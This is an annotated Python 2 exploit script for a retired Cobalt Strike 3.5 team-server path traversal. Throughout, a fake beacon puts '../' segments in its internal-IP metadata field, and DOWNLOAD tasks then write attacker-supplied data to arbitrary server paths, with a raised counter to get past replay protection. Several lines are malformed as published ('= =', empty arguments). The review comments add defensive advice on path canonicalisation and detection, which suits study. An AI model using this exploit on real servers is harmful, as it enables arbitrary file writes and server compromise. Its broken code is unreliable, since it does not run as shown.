Retired Cobalt Strike 3.5 exploit example
# NOTE(review): historical listing of a retired team-server path traversal.
# A beacon-controlled metadata field (the internal IP, set below) is turned
# into a server-side file path, and a DOWNLOAD task then writes args.filedata
# to that path (see the DOWNLOAD_START step). Defensive takeaway: any
# client-supplied value that is later joined into a filesystem path must be
# canonicalised and checked to resolve inside the intended directory; ".."
# segments or path separators in an IP/hostname field are never legitimate
# and are a clear detection signal in team-server logs.
# The code is Python 2 (bare `print` statements). Several lines are
# syntactically malformed as published (`= =`, empty argument positions);
# they are left untouched because the missing values are not recoverable
# from this page.
# First we need to register a beacon with a directory traversal in the ip address field
# Only the directory part of args.filepath goes here; the file name is
# supplied later by the download task.
ip_address = "../../../../../../%s" % os.path.split(args.filepath)[0]
# Generate symmetric keys (used later)
# 16 random bytes, split into separate AES and HMAC keys by generate_keys()
raw_aes_keys = os.urandom(16)
aes_key, hmac_key = generate_keys(raw_aes_keys)
m = Metadata(public_key=args.public_key, cs_version=3)
# NOTE(review): malformed as published (`= =`); intended value not recoverable here.
m.public_key = args.public_key = =
m.ver = "10.0"
# The traversal string travels in the internal-IP field; the technique relies
# on the server using this field in a path without validating it as an address.
m.intz = ip_address
# NOTE(review): the assigned value is missing as published.
m.comp =
m.user = args.username
m.is64 = '1' # 64-bit OS
m.barch = '1' # 64-bit beacon
m.raw_aes_keys = raw_aes_keys
# pack() serialises the metadata; whether it encrypts with public_key is not
# visible on this page.
enc = m.pack()
# register the beacon
print "[*] Staging beacon .."
# NOTE(review): argument list is malformed as published (empty positions).
register_beacon(enc,, args.uri,, args.ssl)
# Now we need to push a DOWNLOAD_START response to cause a file write
print "[*] Creating file .."
# The task carries the file name only; presumably it is joined server-side
# with the traversal path sent in the metadata above.
data, fid = build_download_task(os.path.split(args.filepath)[1], aes_key, hmac_key)
# Send it to the server. This is the equivalent of touch(filepath)
# submit.php should be replaced with malleable C2 setting if applicable
# NOTE(review): argument list is malformed as published (empty positions).
beacon_checkin(, 'submit.php', data,,, args.ssl)
# Build another task which is going to write the data to the touched file
# We force the counter to be higher than the last task to avoid replay protection
# A monotonic counter only rejects replays of old messages; a sender holding
# the session keys can always choose a larger value, so the counter alone is
# not an integrity control on who authored the task.
print "[*] Sending data .."
data = build_download_data(args.filedata, fid, aes_key, hmac_key, counter()+100)
# Fire it..
# NOTE(review): argument list is malformed as published (empty positions).
beacon_checkin(, 'submit.php', data,,, args.ssl)
print "[+] Done!"
